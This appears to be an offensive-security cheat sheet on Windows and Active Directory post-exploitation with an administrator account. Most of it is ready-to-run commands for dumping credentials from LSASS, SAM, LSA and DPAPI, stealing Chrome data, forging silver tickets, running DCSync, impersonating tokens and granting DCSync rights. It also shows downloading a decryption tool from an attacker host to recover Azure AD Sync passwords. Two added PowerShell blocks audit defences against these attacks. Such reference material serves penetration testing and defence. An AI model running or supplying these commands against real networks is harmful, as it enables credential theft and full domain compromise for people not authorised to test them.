# Administrator account

## Extract credentials from LSASS

{% tabs %}
{% tab title="procdump" %}

```
procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

{% endtab %}

{% tab title="mimikatz" %}

```
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
```

{% code overflow="wrap" %}

```
mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
```

{% endcode %}
{% endtab %}

{% tab title="Meterpreter" %}

```
load kiwi

creds_all
```

{% endtab %}

{% tab title="cme" %}

```
cme smb <ip-range> -u <user> -p <password> -M lsassy
```

{% endtab %}

{% tab title="lsassy" %}

```
lsassy -d <domain> -u <user> -p <password> <ip>
```

{% endtab %}
{% endtabs %}
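Added example, not part of the original page: a PowerShell check for the two host-level mitigations that stop the LSASS dumps above (LSA Protection / RunAsPPL and Credential Guard). It assumes an elevated session on the host being audited.

```powershell
# Added example (not from the original page): audit whether the host
# mitigations against LSASS credential dumping are configured.
# Assumes an elevated PowerShell session on the machine being checked.

function Get-LsassProtectionStatus {
    # LSA Protection: with RunAsPPL set, lsass.exe runs as a Protected
    # Process Light and refuses user-mode handle requests such as
    # MiniDumpWriteDump, which procdump and sekurlsa::logonpasswords rely on.
    # 1 = enabled with UEFI lock, 2 = enabled without lock (newer builds).
    $lsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

    # Credential Guard: NTLM hashes and Kerberos keys are isolated in VBS,
    # so even a successful LSASS dump yields no usable secrets.
    # Win32_DeviceGuard.SecurityServicesRunning contains 1 when it is active.
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard `
                          -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuardOn = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)

    # The registry value is the configured state; it only takes effect
    # after a reboot, so report the raw value alongside the verdict.
    [PSCustomObject]@{
        RunAsPPL          = $runAsPpl
        LsaProtectionOn   = ($runAsPpl -in 1, 2)
        CredentialGuardOn = $credGuardOn
    }
}

$status = Get-LsassProtectionStatus
$status | Format-List

if (-not $status.LsaProtectionOn) {
    Write-Warning 'LSA Protection is off: any local admin can dump lsass.exe memory.'
}
if (-not $status.CredentialGuardOn) {
    Write-Warning 'Credential Guard is off: NTLM hashes and Kerberos keys are recoverable from LSASS.'
}
```

Both settings are enforceable centrally via Group Policy; this script only reports the state on the single host it runs on.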

## Extract Credentials from SAM

{% tabs %}
{% tab title="secretsdump" %}

```
secretsdump.py <domain>/<user>:<password>@<ip>
```

{% endtab %}

{% tab title="cme" %}

```
cme smb <ip-range> -u <user> -p <password> --sam
```

{% endtab %}

{% tab title="Meterpreter" %}

```
hashdump
```

{% endtab %}

{% tab title="registries" %}

```
reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
```

{% endtab %}

{% tab title="mimikatz" %}

```
mimikatz "privilege::debug" "lsadump::sam" "exit"
```

{% endtab %}

{% tab title="Shadow Copy" %}
**Shadow copies**

```
diskshadow
DISKSHADOW> list shadows all
```

```
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<N>\
```

{% endtab %}
{% endtabs %}

## Extract Credentials from LSA

{% tabs %}
{% tab title="cme" %}

```
cme smb <ip-range> -u <user> -p <password> --lsa
```

{% endtab %}

{% tab title="secretsdump" %}

```
secretsdump.py <domain>/<user>:<password>@<ip>
```

```
secretsdump.py -security <security-file> -system <system-file> LOCAL
```

{% endtab %}

{% tab title="reg.py" %}

```
reg.py <domain>/<user>:<password>@<ip> backup -o '\\<smb-ip>\share'
```

{% endtab %}
{% endtabs %}

## Extract dpapi

{% tabs %}
{% tab title="donPAPI" %}

```
DonPAPI.py <domain>/<user>:<password>@<target>
```

{% endtab %}

{% tab title="mimikatz" %}

```
mimikatz.exe "sekurlsa::dpapi"
```

{% endtab %}

{% tab title="secretsdump" %}

```
secretsdump.py <domain>/<user>:<password>@<ip>
```

{% endtab %}
{% endtabs %}

## Extract kerberos tickets

```
sekurlsa::tickets
```

## Silver Tickets

**Prerequisites**

* SPN password hash
* Domain SID
* Target SPN

### Silver Ticket Forgery

**NTLM Hash**

We have to load mimikatz and extract the NTLM hash:

```
iwr -UseDefaultCredentials http://<RHOST>
.\mimikatz.exe
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
NTLM: 4d28cf5252d39971419580a51484ca09
```

**Domain SID**

Then to obtain the SID use whoami:

```
whoami /user
SID: S-1-5-21-1987370270-658905905-1781884369-1105 (S-1-5-21-1987370270-658905905-1781884369)
```

**Ticket Forging**

With that information we can forge the ticket:

```
mimikatz # kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:<DOMAIN> /ptt /target:<RHOST> /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:<attacker_user>
```

**Using the ticket**

```
klist
iwr -UseDefaultCredentials http://<RHOST>
```

## DCSync

{% tabs %}
{% tab title="mimikatz" %}

```
.\mimikatz.exe
mimikatz # lsadump::dcsync /user:<DOMAIN>\<USERNAME>
mimikatz # lsadump::dcsync /user:<DOMAIN>\Administrator
```

{% endtab %}

{% tab title="impacket-secretsdump" %}
**NTLM Hash of one user**

```
impacket-secretsdump -just-dc-user <user_target> <domain>/<user>:'<pass>'@<ip>
```

**Dump all hashes**

```
impacket-secretsdump <domain>/<user>:'<pass>'@<ip>
```

{% endtab %}
{% endtabs %}

## Search Password Files

```
findstr /si "password" *.txt *.xml *.docx
```

## Search Stored Password

```
lazagne.exe all
```

## Chrome

```
%LOCALAPPDATA%\Google\Chrome\User Data\Default
```

```
SharpChromium.exe
```

## Token Manipulation

{% tabs %}
{% tab title="incognito" %}

```
.\incognito.exe list_tokens -u
```

```
.\incognito.exe execute -c "<domain>\<user>" powershell.exe
```

{% endtab %}

{% tab title="Meterpreter" %}

```
use incognito
```

```
impersonate_token <domain>\\<user>
```

{% endtab %}

{% tab title="cme" %}

```
cme smb <ip> -u <user> -p <password> -M impersonate
```

{% endtab %}
{% endtabs %}

## Account Operators Group Membership

**Add User**

```
net user <USERNAME> <PASSWORD> /add /domain
net group "Exchange Windows Permissions" <USERNAME> /add /domain
```

**Import PowerView**

```
powershell -ep bypass
. .\PowerView.ps1
```

**Add DCSync Rights**

```
$pass = convertto-securestring '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=<DOMAIN>,DC=<TLD>" -PrincipalIdentity <USERNAME> -Rights DCSync
```

**DCSync**

```
impacket-secretsdump '<USERNAME>:<PASSWORD>@<RHOST>'
```
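Added example, not part of the original page: an audit of which principals hold the two replication extended rights on the domain naming context, so a grant like the Add-DomainObjectAcl step above (or any other unexpected DCSync capability) shows up. It assumes the ActiveDirectory RSAT module in a domain-joined session; the GUIDs are the schema's well-known extended-right identifiers.

```powershell
# Added example (not from the original page): enumerate principals with
# DCSync rights directly on the domain partition.
# Assumes the ActiveDirectory module (RSAT) and a domain-joined session.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs from the AD schema (not page-specific).
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

function Get-DcSyncPrincipals {
    param([string]$DomainDn = (Get-ADDomain).DistinguishedName)

    # The AD: PSDrive is registered by the ActiveDirectory module.
    $acl = Get-Acl -Path ("AD:\" + $DomainDn)

    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.ActiveDirectoryRights -match 'ExtendedRight' -and
            $ReplRights.ContainsKey($_.ObjectType.ToString())
        } |
        Group-Object IdentityReference |
        ForEach-Object {
            $rights = @($_.Group | ForEach-Object { $ReplRights[$_.ObjectType.ToString()] } |
                        Sort-Object -Unique)
            [PSCustomObject]@{
                Principal = $_.Name
                Rights    = ($rights -join ', ')
                # lsadump::dcsync / secretsdump need both rights together.
                CanDcSync = ($rights.Count -eq 2)
            }
        }
}

# On a default domain expect Administrators, Domain Controllers and
# Enterprise Domain Controllers (plus the AD Connect MSOL_* account if
# installed); anything else deserves a ticket.
Get-DcSyncPrincipals | Sort-Object CanDcSync -Descending | Format-Table -AutoSize
```

This lists explicit ACEs only; a principal with GenericAll or WriteDacl on the domain object (the Exchange Windows Permissions path used above) can grant itself these rights and is not shown until it does.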

## Azure Admin Group Membership

If a user is a member of the Azure Admins group, we can try to abuse Azure AD Sync to recover the administrator password:

{% embed url="<https://github.com/VbScrub/AdSyncDecrypt/releases/tag/v1.0>" %}

```
iwr http://<IP>/AdDecrypt.exe -o AdDecrypt.exe
iwr <IP>/mcrypt.dll -o mcrypt.dll
```

Then change directory to `C:\Program Files\Microsoft Azure AD Sync\Bin` and run the tool from there:

```
C:\Temp\AdDecrypt.exe -FullSQL
```
